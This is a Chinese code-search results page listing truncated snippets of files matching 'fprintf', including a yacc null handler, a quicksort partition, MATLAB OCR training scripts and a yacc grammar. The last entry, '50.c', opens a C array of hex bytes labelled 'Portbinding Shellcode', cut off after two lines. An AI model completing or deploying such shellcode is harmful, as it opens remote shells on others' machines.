代码搜索:fprintf
找到约 10,000 项符合「fprintf」的源代码
代码结果 10,000
www.eeworm.com/read/312649/13606611
c yynull.c
#include
#include
#ifndef EXPORT
#define EXPORT
#endif
static char rcsid[] = "$Id: yynull.c,v 1.3 2001/06/07 22:30:09 drh Exp $";
EXPORT void _YYnull(char *file, int lin
www.eeworm.com/read/312294/13613876
cpp oil_pipe.cpp
#include
#include
#include
int partition(int a[],int p,int r)//快速排序的划分函数
{
int i,j,x,temp;
i=p;
j=r+1;
x=a[p];
while (1)
{
www.eeworm.com/read/312163/13617312
m usps2mat.m
% USPS2MAT converts USPS database to Matlab data file (MAT).
%
% Description:
% It creates MAT-file containing training and testing part
% of the USPS database of handwritten numerals.
%
% Input:
www.eeworm.com/read/312163/13617538
m~ train_ocr.m~
% TRAIN_OCR Training of OCR classifier based on multiclass SVM.
%
% Description:
% The following steps are performed:
% - Training set is created from data in directory ExamplesDir.
% - Mult
www.eeworm.com/read/312163/13617540
m tune_ocr.m
% TUNE_OCR Tunes SVM classifier for OCR problem.
%
% Description:
% The following steps are performed:
% - Training set is created from data in directory ExamplesDir.
% - Multi-class SVM is
www.eeworm.com/read/312163/13617541
m train_ocr.m
% TRAIN_OCR Training of OCR classifier based on multiclass SVM.
%
% Description:
% The following steps are performed:
% - Training set is created from data in directory ExamplesDir.
% - Mult
www.eeworm.com/read/311920/13622531
y lr.y
%{
#include
%}
%token INTEGER
%token REAL
%token IDENTIFIER
%%
D : T R ';' { $2 = $1; }
T : REAL
| INTEGER
R : R ',' IDENTIFIER { $1 = $$; $3 = $$; printf("%d ", $3); }
| IDENTIFIER {
www.eeworm.com/read/311844/13624784
c 50.c
#include
#include
#include
//Portbinding Shellcode
char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\